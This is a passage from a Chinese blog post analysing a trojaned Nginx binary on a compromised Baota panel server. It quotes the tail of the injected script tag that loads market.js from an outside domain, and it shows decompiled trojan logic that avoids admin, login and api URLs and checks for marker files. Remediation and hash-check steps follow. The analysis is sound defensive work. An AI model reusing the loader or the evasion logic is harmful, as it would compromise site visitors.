src='https://www.metamarket.quest/market.js'></script>排查分析由于宝塔官方没有明确说明面板存在0day漏洞,目前只能转向分析Nginx样本了我们把被替换过的nginx病毒样本拖到ida里面 然后F5反编译一下 定位到 __int64 __fastcall sub_4BE051 函数然后我们会看到一段 waf_sc=5889647726 这里则对应我们上面分析JavaScript代码的值我们分析一下以下代码 if ( a1[99] && a1[98] ) { if ( ngx_strcasestrn(a2, "admin", 4LL) || ngx_strcasestrn(a2, "user", 3LL) || ngx_strcasestrn(a2, "manager", 6LL) || ngx_strcasestrn(a2, "api", 2LL) || ngx_strcasestrn(a2, "config", 5LL) || ngx_strcasestrn(a2, "login", 4LL) || ngx_strcasestrn(a2, 7689484LL, 3LL) || ngx_strcasestrn(a2, ".xml", 3LL) || ngx_strcasestrn(a2, ".css", 3LL) ) { sprintf(v11, "return 3 url:%s method:%d", a2, a1[122]); sub_4BDFE1(v11); result = 3LL; } else { v9 = access("/tmp/systemd-private-56d86f7d8382402517f3b5-jP37av", 0); result = 6LL; if ( v9 != -1 ) { v10 = access("/var/tmp/systemd-private-56d86f7d8382402517f3b51625789161d2cb-chronyd.service-jP37av", 0) == -1; result = 7LL; if ( !v10 ) result = 0LL; } } } else { sub_4BDFE1("return 2"); result = 2LL; }从这里,我们就能很清楚的看到了, 「v9」和 「v10」这两个变量应该就对应了恶意代码,通过 access 方式读入文件,不过按照被感染后的代码逻辑,应该是先判断是否包含以下字符串,没有就输出恶意代码。'admin' 'user' 'manager' 'api' 'config' 'login' '/var/tmp/msglog.txt' '.xml' '.css'关于 「 ngx_strcasestrn 」函数的用法,大家在网上也能够搜得到。补救措施博主推荐以下的排查方式 如下1.请手动排查一下 /tmp/ 和 /var/tmp/ 目录下有没有 systemd-private-56d86f7d8382402517f3b5-jP37av 这个文件,如果有请尽快删除掉 然后修改一下服务器密码和修改相关目录的权限2.如果当前宝塔面板还在用的话,请修改面板端口以及加强一下面板安全性 3.开启 BasicAuth认证 和 动态口令认证或者访问设备验证 4.手动排查一下Nginx程序的MD5值是否对应在ssh输入以下代码即可md5sum /www/server/nginx/sbin/nginx md5sum /www/backup/nginxBak cat /www/server/panel/data/nginx_md5.pl
-
![[更新记录]博客更新优化记录](https://img.toubiec.cn/usr/themes/Joe/npm/img/29.jpg!400x400)
![[技术分享]宝塔面板PHP安装IMAP扩展失败解决方法](https://img.toubiec.cn/usr/uploads/2025/01/679ba477122c5.webp)
![[Python源码]QQ音乐无损解析开源](https://img.toubiec.cn/usr/uploads/2024/10/670bf559239ea.webp!400x400)
![[Python源码]工信部ICP备案查询接口源码-修复](https://img.toubiec.cn/usr/uploads/2024/10/670133ce3329b.webp!400x400)
![[Typecho插件]Typecho上传图片自动转为Webp/Avif格式插件](https://img.toubiec.cn/usr/uploads/2024/09/66da4efc42f3f.webp)
![[PHP源码]PHP最新获取QQ昵称源码](https://img.toubiec.cn/usr/uploads/2024/07/819604505.png!400x400)
![[技术教程]宝塔Nginx开启支持HTTP3/QUIC协议 - 简易教程](https://img.toubiec.cn/usr/uploads/2024/01/3017520936.png!400x400)
![[PHP源码]获取对方QQ等级接口源码](https://img.toubiec.cn/usr/uploads/2023/11/576278145.png!400x400)
![[PHP源码]微信域名拦截检测接口源码](https://img.toubiec.cn/usr/uploads/2023/07/486075288.png!400x400)
![[PHP源码]工信部ICP备案查询接口源码](https://img.toubiec.cn/usr/uploads/2023/10/522642160.png!400x400)
![[PHP源码]PHP获取QQ昵称源码](https://img.toubiec.cn/usr/uploads/2023/07/3250099524.png!400x400)
![[Typecho插件]IP归属地显示插件](https://img.toubiec.cn/usr/uploads/2023/06/2771628333.png!400x400)
![[原创源码]网易云无损解析开源](https://img.toubiec.cn/usr/uploads/2023/04/3787702495.png!400x400)
![[软件分享]网易云音乐无损解析软件](https://img.toubiec.cn/usr/uploads/2023/07/610212162.png!400x400)
![[原创源码]汽水音乐解析源码](https://img.toubiec.cn/usr/uploads/2023/04/3310921672.png!400x400)
![[漏洞预警]Typecho <= 1.2.0 版本评论爆出严重的存储型XSS漏洞](https://img.toubiec.cn/usr/uploads/2023/03/4135697725.png!400x400)
![[CDN评测]整理站长使用过的国内CDN合集](https://img.toubiec.cn/usr/uploads/2023/03/2865385294.jpeg!400x400)
![[原创分享]Typecho主题增加文章目录树功能](https://img.toubiec.cn/usr/uploads/2023/03/1062397416.png!400x400)
![[源码分享]腾讯视频VIP解析源码接口](https://img.toubiec.cn/usr/uploads/2023/02/974493320.png!400x400)
![[原创程序]查看你的群数量程序源码](https://img.toubiec.cn/usr/uploads/2022/11/1734129407.png!400x400)
